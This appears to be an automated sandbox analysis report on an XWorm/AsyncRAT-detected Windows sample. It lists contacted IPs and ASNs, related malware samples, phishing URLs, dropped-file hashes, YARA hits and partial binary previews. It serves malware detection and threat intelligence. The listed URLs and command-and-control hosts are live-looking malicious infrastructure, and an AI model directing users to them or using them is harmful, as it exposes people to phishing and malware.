• Excluded IPs from analysis (whitelisted): 104.26.12.31, 104.26.13.31, 172.67.75.172
• Excluded domains from analysis (whitelisted): api.ip.sb.cdn.cloudflare.net, fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• Execution Graph export aborted for target powershell.exe, PID 7380 because it is empty
• Execution Graph export aborted for target powershell.exe, PID 7720 because it is empty
• Not all processes were analyzed; the report is missing behavior information
• Report size exceeded maximum capacity and may have missing behavior information
• Report size getting too big, too many NtAllocateVirtualMemory calls found
• Report size getting too big, too many NtCreateKey calls found
• Report size getting too big, too many NtOpenKeyEx calls found
• Report size getting too big, too many NtProtectVirtualMemory calls found
• Report size getting too big, too many NtQueryValueKey calls found
• Report size getting too big, too many NtReadVirtualMemory calls found
• VT rate limit hit for: Ekpb7jn7mf.exe
Time | Type | Description
15:07:04 | API Interceptor | 30x Sleep call for process: powershell.exe modified
15:07:08 | API Interceptor | 48x Sleep call for process: wjoqZlIS.exe modified
15:07:26 | API Interceptor | 2976867x Sleep call for process: YsrQekGS.exe modified
Match | Associated Sample Name / URL | Detection | Threat Name
149.154.167.220 | Revised PI_2024.exe | malicious | GuLoader, Snake Keylogger
149.154.167.220 | rVesselSchedule.exe | malicious | PureLog Stealer, Snake Keylogger, VIP Keylogger
149.154.167.220 | bodrum_buro.pdf.exe | malicious | Snake Keylogger, VIP Keylogger
149.154.167.220 | Proforma fatura.pdf.exe | malicious | Snake Keylogger, VIP Keylogger
149.154.167.220 | New order 01.exe | malicious | Snake Keylogger, VIP Keylogger
149.154.167.220 | https://choicesfdc.com.au/readm.html?colors=c2FyYS5nZWlnZXJAc2JhZmxhLmNvbQ== | malicious | HTMLPhisher
149.154.167.220 | rTransaction_ReceiptCopy.exe | malicious | PureLog Stealer, Snake Keylogger, VIP Keylogger
149.154.167.220 | Brnesde.exe | malicious | GuLoader, Snake Keylogger
149.154.167.220 | NewOrder_LCL240887.exe | malicious | GuLoader, Snake Keylogger
149.154.167.220 | Makrokdernes.exe | malicious | GuLoader, Snake Keylogger
147.185.221.20 | real-al-d7ya.exe | malicious | XWorm
147.185.221.20 | WindowsHealthProtect.exe | malicious | XWorm
147.185.221.20 | Ym9RghQJbG.exe | malicious | Njrat
147.185.221.20 | $77wsappx.exe | malicious | SilverRat
147.185.221.20 | Nursultan Crack Minecraft 1.16.5.exe | malicious | XWorm
147.185.221.20 | setup.exe | malicious | Blank Grabber, Njrat, Umbral Stealer, XWorm
147.185.221.20 | Antilose 2.0.exe | malicious | XWorm
147.185.221.20 | Realtek HD Audio Universal Service.exe | malicious | AsyncRAT, XWorm
147.185.221.20 | dllhost.exe | malicious | XWorm
147.185.221.20 | #U666e.#U901a.#U53d1.#U7968.#U52a9#U624b#U518c.exe | malicious | Unknown
Match | Associated Sample Name / URL | Detection | Threat Name | Context
api.telegram.org | Revised PI_2024.exe | malicious | GuLoader, Snake Keylogger | 149.154.167.220
api.telegram.org | rVesselSchedule.exe | malicious | PureLog Stealer, Snake Keylogger, VIP Keylogger | 149.154.167.220
api.telegram.org | bodrum_buro.pdf.exe | malicious | Snake Keylogger, VIP Keylogger | 149.154.167.220
api.telegram.org | Proforma fatura.pdf.exe | malicious | Snake Keylogger, VIP Keylogger | 149.154.167.220
api.telegram.org | New order 01.exe | malicious | Snake Keylogger, VIP Keylogger | 149.154.167.220
api.telegram.org | https://choicesfdc.com.au/readm.html?colors=c2FyYS5nZWlnZXJAc2JhZmxhLmNvbQ== | malicious | HTMLPhisher | 149.154.167.220
api.telegram.org | rTransaction_ReceiptCopy.exe | malicious | PureLog Stealer, Snake Keylogger, VIP Keylogger | 149.154.167.220
api.telegram.org | Brnesde.exe | malicious | GuLoader, Snake Keylogger | 149.154.167.220
api.telegram.org | NewOrder_LCL240887.exe | malicious | GuLoader, Snake Keylogger | 149.154.167.220
api.telegram.org | Makrokdernes.exe | malicious | GuLoader, Snake Keylogger | 149.154.167.220
Match | Associated Sample Name / URL | Detection | Threat Name | Context
SALSGIVERUS | python.exe | malicious | XWorm | 147.185.221.21
SALSGIVERUS | setup.exe | malicious | XWorm | 147.185.221.21
SALSGIVERUS | real-al-d7ya.exe | malicious | XWorm | 147.185.221.20
SALSGIVERUS | Avowed Beta.exe | malicious | XWorm | 147.185.221.21
SALSGIVERUS | nebula.exe | malicious | XWorm | 147.185.221.21
SALSGIVERUS | WaveInstaller.exe | malicious | XWorm | 147.185.221.19
SALSGIVERUS | PC driver.exe | malicious | XWorm | 147.185.221.19
SALSGIVERUS | Server.exe | malicious | Njrat | 147.185.221.21
SALSGIVERUS | hack fivem.exe | malicious | Njrat | 147.185.221.21
SALSGIVERUS | WindowsHealthProtect.exe | malicious | XWorm | 147.185.221.20
TELEGRAMRU | Revised PI_2024.exe | malicious | GuLoader, Snake Keylogger | 149.154.167.220
TELEGRAMRU | rVesselSchedule.exe | malicious | PureLog Stealer, Snake Keylogger, VIP Keylogger | 149.154.167.220
TELEGRAMRU | bodrum_buro.pdf.exe | malicious | Snake Keylogger, VIP Keylogger | 149.154.167.220
TELEGRAMRU | Proforma fatura.pdf.exe | malicious | Snake Keylogger, VIP Keylogger | 149.154.167.220
TELEGRAMRU | New order 01.exe | malicious | Snake Keylogger, VIP Keylogger | 149.154.167.220
TELEGRAMRU | http://b17.videoprivate-live.com/ | malicious | Unknown | 149.154.167.99
TELEGRAMRU | https://qzf1.haveplentymusic.com/ | malicious | Unknown | 149.154.167.99
TELEGRAMRU | https://choicesfdc.com.au/readm.html?colors=c2FyYS5nZWlnZXJAc2JhZmxhLmNvbQ== | malicious | HTMLPhisher | 149.154.167.220
TELEGRAMRU | http://www.nicetours.net | malicious | Unknown | 149.154.167.99
TELEGRAMRU | rTransaction_ReceiptCopy.exe | malicious | PureLog Stealer, Snake Keylogger, VIP Keylogger | 149.154.167.220
ANONYMIZEEpikNetworkCH | 27062024_1338_ItsComedy.exe | malicious | AsyncRAT | 45.88.186.62
ANONYMIZEEpikNetworkCH | https://campaign-statistics.com/link_click/RqeqbFIupG_SarXt/c7754e02779513a9011493d63e2dacdc | malicious | AsyncRAT | 45.88.186.168
ANONYMIZEEpikNetworkCH | GfU2VYzM9r.elf | malicious | Mirai | 91.149.192.15
ANONYMIZEEpikNetworkCH | Documento di richiesta di preventivo NR_531 28 05 24.exe | malicious | FormBook | 185.83.214.222
ANONYMIZEEpikNetworkCH | SecuriteInfo.com.Heuristic.HEUR.AGEN.1309146.31110.1872.exe | malicious | RedLine, XWorm | 45.88.186.125
ANONYMIZEEpikNetworkCH | ehQfAH429r.exe | malicious | RedLine, XWorm | 45.88.186.125
ANONYMIZEEpikNetworkCH | 6tJtH22I7a.exe | malicious | LummaC, Amadey, LummaC Stealer, Mars Stealer, PureLog Stealer, RedLine, Stealc | 45.88.186.125
ANONYMIZEEpikNetworkCH | t2SFfMxQP1.exe | malicious | PureLog Stealer, RedLine, XWorm | 45.88.186.125
ANONYMIZEEpikNetworkCH | LFfjUMuUFU.exe | malicious | AsyncRAT, PureLog Stealer, XWorm | 45.88.186.125
ANONYMIZEEpikNetworkCH | x86.elf | malicious | Mirai, Moobot | 91.149.192.120
Match | Associated Sample Name / URL | Detection | Threat Name | Context
3b5074b1b5d032e5620f69f9f700ff0e | https://shared.outlook.inky.com/link?domain=doni2.r.ag.d.sendibm3.com&t=h.eJwdj8tOwzAQAH-l8hl5Yztpkp56QjwEqBdKuSA_1onVjY0cB4QQ_07T80gzml-2ZGK7DRtL-Zx3AC7FIHnmeuCOzxhdMJPiNk0wncESeJhHePmx7193y20SeCj57RSOz-70-PQA5v7wUVWvNNJRsZsNO6_qiCXlwRch2-22FTDpEAtGHS3uR8yh6AG_dcE8B4fXVNcYIVXToOq80dhLbVqPlaxcjZ1DBaKVQtR133dcijWE1wckSnvr0SyB3MW3ylbqLjQuRH__e5FMBA.MEUCICPVdJ8A6eCIy5PEte1B5Fmj9jEJmTviOeNz1I2ChDF5AiEAq8t8ZLlriqRms2EdUTwM4-x3XuuMwf9TxieA_Ny75ng | malicious | HTMLPhisher, Tycoon2FA | 149.154.167.220
3b5074b1b5d032e5620f69f9f700ff0e | MCU1IoNwCn.js | malicious | Unknown | 149.154.167.220
3b5074b1b5d032e5620f69f9f700ff0e | https://www.canva.com/design/DAGLF3snAws/kgV8XMEaCHOJeaPJkLlFKQ/edit?utm_content=DAGLF3snAws&utm_campaign=designshare&utm_medium=link2&utm_source=sharebutton | malicious | Unknown | 149.154.167.220
3b5074b1b5d032e5620f69f9f700ff0e | Revised PI_2024.exe | malicious | GuLoader, Snake Keylogger | 149.154.167.220
3b5074b1b5d032e5620f69f9f700ff0e | https://ambassadorlimo.com/ | malicious | Unknown | 149.154.167.220
3b5074b1b5d032e5620f69f9f700ff0e | Docs Shipping PO#QSB-8927393_2324, QSB-8927394_23-24.exe | malicious | AgentTesla | 149.154.167.220
3b5074b1b5d032e5620f69f9f700ff0e | https://email.app.bamboohr.com/c/eJyMkEFPwyAcxT8N3NrAn1L0wGFuLmFxGnXLzC4LUJpiB9SWLe7bm5kdPXh7yXvv8PvZFMIpequzT_HgGwlg7b3gpKgYdwWlri00qUXR1tRyECCEMdimMOh4ue6tbw5QUy4ItqcppyDdZUX2O96Z-Lbaz1WtPhWsN1u2nqtJheez-XjoTDz-0fHO7Lb-xauLWijfviK2QGyBG2krgZ2kAigFLkiNO8mYBm3rhld3wJkzQgjKK2oYMdw547D_FwqqiB6G0uhgUurG0qaAj7LLeZgQmyFYIlj2vh99_51KH9uEYDmMDo9Sx97nctA5elSRrzyl4_n3nuVs8354XM_UE84u6pivnm7ppuos4ScAAP__pKt0pQ= | malicious | HTMLPhisher | 149.154.167.220
3b5074b1b5d032e5620f69f9f700ff0e | 1027852000XLS.exe | malicious | AgentTesla | 149.154.167.220
3b5074b1b5d032e5620f69f9f700ff0e | XloyRIBlmdu28Vh.exe | malicious | AgentTesla, PureLog Stealer | 149.154.167.220
3b5074b1b5d032e5620f69f9f700ff0e | https://beededelva.za.com/secured/index.html | malicious | HTMLPhisher | 149.154.167.220
Match | Associated Sample Name / URL | Detection | Threat Name
C:\Users\user\AppData\Local\Temp\rKPaQokQ.exe | Michael_Gorn_Resume.iso | malicious | Unknown
C:\Users\user\AppData\Local\Temp\rKPaQokQ.exe | Michael_Gorn_Resume.docx.lnk | malicious | Unknown
Process: C:\Users\user\AppData\Local\Temp\wjoqZlIS.exe
File Type: ASCII text, with CRLF line terminators
Category: dropped
Size (bytes): 2666
Entropy (8bit): 5.345804351520589
Encrypted: false
SSDEEP: 48:MOfHK5HKxHKdHK8THaAHKzecYHKh3oPtHo6nmHKtXooBHKoHzHZHxLHG1qHjHKd2:vq5qxqdqolqztYqh3oPtI6mq7qoT5RL9
MD5: 3D3B62B70DF65C6D62C6B068D7256706
SHA1: 03CCEE715BD3299367368426E025742C869155B0
SHA-256: 7373A8D46BC57A95D1C80A2FCD34FF0238B7A0981147FBEA9C28F32F46C653BB
SHA-512: E259F86B1107BCBFA7F72AB3D199F13AF10644848398DD02D22012B626F353A9EE6865A16E5EA39A7657727D3DA6384F7EA424D8ADEA8F4162C106E90737D559
Malicious: false
Reputation: moderate, very likely benign file
Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.ServiceModel, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"SMDiagnostics, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System.Runtime.Serialization, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Runteb92aa12#\a3127677749631df61e96a8400ddcb87\System.Runtime.Serialization.ni.dll",0..2,"System.ServiceModel.Internals, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02b0c61bb4\System.Xml.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral,
Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type: data
Category: dropped
Size (bytes): 64
Entropy (8bit): 0.34726597513537405
Encrypted: false
SSDEEP: 3:Nlll:Nll
MD5: 446DD1CF97EABA21CF14D03AEBC79F27
SHA1: 36E4CC7367E0C7B40F4A8ACE272941EA46373799
SHA-256: A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
SHA-512: A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
Malicious: false
Reputation: high, very likely benign file
Preview: @...e...........................................................
Process: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exe
File Type: MS Windows registry file, NT/2000 or above
Category: dropped
Size (bytes): 8192
Entropy (8bit): 0.7321271493407865
Encrypted: false
SSDEEP: 24:1E44W4F1Ln5lDuUbwB7uh/+wB7tXadnW/6ZPo:TJ4rH87ub70
MD5: 3491AA8F2B3007257847EA899C9C7260
SHA1: 6151808DDE97AD86461FA3BA89FC3990602B3D9F
SHA-256: 36A3BA27CDCD023598DEF219E8268A227773C2AE2C72465B65F8949476F1C57B
SHA-512: B27C0AA36B391ED7E54F96B35C079ACA833032201D7AB044480A8DD3D70DF635F1ABA564F35CCB15E2B296C2B1FBD4F8AFCE196FFB3409E449FE030BB0177BB0
Malicious: false
Preview: regf........b.Q.7.................. ...........y.b.3.d.8.b.b.w.e.\.S.e.t.t.i.n.g.s.\.s.e.t.t.i.n.g.s...d.a.t...y..j.....J.....y..j.....J.........z..j.....J.....rmtmf.V................................................................................................................................................................................................................................................................................................................................................~.d.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
Process: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exe
File Type: MS Windows registry file, NT/2000 or above
Category: dropped
Size (bytes): 8192
Entropy (8bit): 0.7697346988458389
Encrypted: false
SSDEEP: 24:6e44W4F1z9YM07n5lDuUbwB7uh/+wB7tXadnW/6ZPo:IJ4OTjH87ub70
MD5: 52036240BD70CE776C77A45563B888E2
SHA1: B0C4609BF975DE8DEC5F67E176E033DAD8C131BC
SHA-256: 1CA0368283EE5E7B794D2A7F4155B349D73DB5942B41D75EE6383DAEEA1FAC6C
SHA-512: 02772CE9DC6B02EA86BCC9837612CA6E8B3709EDA2F9570B20D90F422F1364E013C4BFFCC41F2849B34FBCDCF1ED455F976E31C8ABC38925FE3C5B1381703970
Malicious: false
Preview: regf........b.Q.7.................. ...........y.b.3.d.8.b.b.w.e.\.S.e.t.t.i.n.g.s.\.s.e.t.t.i.n.g.s...d.a.t...y..j.....J.....y..j.....J.........z..j.....J.....rmtmf.V................................................................................................................................................................................................................................................................................................................................................y.d.HvLE....................L...w..J...0%.[.........hbin................b.Q.7..........nk,.T...7..................................x...............................Test....p...sk..h...h.......t.......H...X.............4.........?.......................?....................... ... ...............YQ..fr]%dc;.............vk......0...........VeryFirstLaunch.........V...................vk................y Mode....p...sk..x...x.......t.......H...X.............4.........?.......................
                                                                                Process:C:\Users\user\Desktop\Ekpb7jn7mf.exe
                                                                                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                Category:dropped
                                                                                Size (bytes):42496
                                                                                Entropy (8bit):5.578448002075782
                                                                                Encrypted:false
                                                                                SSDEEP:768:OTOwtnrg5uKlP0Rl0GQvvdF3q9iR6TO+hiIMAz:OTOIMQKx077QvFF69iR6TO+QMz
                                                                                MD5:6EA393666ED89F758B30EA5037F5C22A
                                                                                SHA1:ECEEAE7BDEC94AD08B8E8F9ABF057474C602228B
                                                                                SHA-256:AF8318698C0BA525D71F5075BE304B4A096DD87A2F058854594C50C33F7CB387
                                                                                SHA-512:828D857ED80010E1DDE132098CED55AAB759FA0F4E99921AEE8DE75A946CBF4ECB41F20F0D16837E58C562EF7EB538A86729B8636E06E322C8C154029DECDD6E
                                                                                Malicious:true
                                                                                Yara Hits:
                                                                                • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: C:\Users\user\AppData\Local\Temp\YsrQekGS.exe, Author: Joe Security
                                                                                • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Users\user\AppData\Local\Temp\YsrQekGS.exe, Author: Joe Security
                                                                                • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: C:\Users\user\AppData\Local\Temp\YsrQekGS.exe, Author: ditekSHen
                                                                                Antivirus:
                                                                                • Antivirus: Avira, Detection: 100%
                                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                • Antivirus: ReversingLabs, Detection: 92%
                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...[Kkf................................. ........@.. ....................................@.....................................K.................................................................................... ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc..............................@..B.......................H........[...]............................................................(....*..(....*.s.........s.........s.........s.........*...0..........~....o.....+..*..0..........~....o.....+..*..0..........~....o.....+..*..0..........~....o.....+..*..0............(....(.....+..*....0...........(.....+..*..0...............(.....+..*..0...........(.....+..*..0................-.(...+.+.+...+..*.0.........................*..(....*.0.. .......~.........-.(...+.....~.....+..*..(....*.0..
                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                File Type:ASCII text, with no line terminators
                                                                                Category:dropped
                                                                                Size (bytes):60
                                                                                Entropy (8bit):4.038920595031593
                                                                                Encrypted:false
                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                Malicious:false
                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                File Type:ASCII text, with no line terminators
                                                                                Category:dropped
                                                                                Size (bytes):60
                                                                                Entropy (8bit):4.038920595031593
                                                                                Encrypted:false
                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                Malicious:false
                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                File Type:ASCII text, with no line terminators
                                                                                Category:dropped
                                                                                Size (bytes):60
                                                                                Entropy (8bit):4.038920595031593
                                                                                Encrypted:false
                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                Malicious:false
                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                File Type:ASCII text, with no line terminators
                                                                                Category:dropped
                                                                                Size (bytes):60
                                                                                Entropy (8bit):4.038920595031593
                                                                                Encrypted:false
                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                Malicious:false
                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                File Type:ASCII text, with no line terminators
                                                                                Category:dropped
                                                                                Size (bytes):60
                                                                                Entropy (8bit):4.038920595031593
                                                                                Encrypted:false
                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                Malicious:false
                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                File Type:ASCII text, with no line terminators
                                                                                Category:dropped
                                                                                Size (bytes):60
                                                                                Entropy (8bit):4.038920595031593
                                                                                Encrypted:false
                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                Malicious:false
                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                File Type:ASCII text, with no line terminators
                                                                                Category:dropped
                                                                                Size (bytes):60
                                                                                Entropy (8bit):4.038920595031593
                                                                                Encrypted:false
                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                Malicious:false
                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                File Type:ASCII text, with no line terminators
                                                                                Category:dropped
                                                                                Size (bytes):60
                                                                                Entropy (8bit):4.038920595031593
                                                                                Encrypted:false
                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                Malicious:false
                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                Process:C:\Users\user\Desktop\Ekpb7jn7mf.exe
                                                                                File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                Category:dropped
                                                                                Size (bytes):27648
                                                                                Entropy (8bit):3.8743902487326958
                                                                                Encrypted:false
                                                                                SSDEEP:384:S3B2ChTCfxWqHPuOOLE8eWS0YWbiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiLih:a2CwxTmOv8zG
                                                                                MD5:DEAD69D07BC33B762ABD466FB6F53E11
                                                                                SHA1:F5ED372FD8EC7C455FF66BCE73F16CA51CBC0302
                                                                                SHA-256:3091E2ABFB55D05D6284B6C4B058B62C8C28AFC1D883B699E9A2B5482EC6FD51
                                                                                SHA-512:F33A402E96474FC10F870293058B7252517456B4053D85885EBF21D0F9166F9A8A86457327A3E307624864B30CA9888AE0399A90C6248C50B781B28D9981C0C6
                                                                                Malicious:true
                                                                                Antivirus:
                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                Joe Sandbox View:
                                                                                • Filename: Michael_Gorn_Resume.iso, Detection: malicious, Browse
                                                                                • Filename: Michael_Gorn_Resume.docx.lnk, Detection: malicious, Browse
                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........~.h...h...h.......h...h...h.......h.......h.......h.......h.......h.....h.......h..Rich.h..................PE..d.....Y..........."..........b......0..........@.....................................j....`.......... ......................................d'.......P...G...@..................,....#..T............................ ...............!..@............................text............................... ..`.rdata..F.... ......................@..@.data...8....0......................@....pdata.......@....... ..............@..@.rsrc....G...P...H..."..............@..@.reloc..,............j..............@..B................................................................................................................................................................................................................................................................
                                                                                Process:C:\Users\user\AppData\Local\Temp\wjoqZlIS.exe
                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                Category:dropped
                                                                                Size (bytes):106496
                                                                                Entropy (8bit):1.1358696453229276
                                                                                Encrypted:false
                                                                                SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                Malicious:false
                                                                                Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                Process:C:\Users\user\AppData\Local\Temp\wjoqZlIS.exe
                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                Category:dropped
                                                                                Size (bytes):106496
                                                                                Entropy (8bit):1.1358696453229276
                                                                                Encrypted:false
                                                                                SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                Malicious:false
                                                                                Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                Process:C:\Users\user\AppData\Local\Temp\wjoqZlIS.exe
                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                Category:dropped
                                                                                Size (bytes):106496
                                                                                Entropy (8bit):1.1358696453229276
                                                                                Encrypted:false
                                                                                SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                Malicious:false
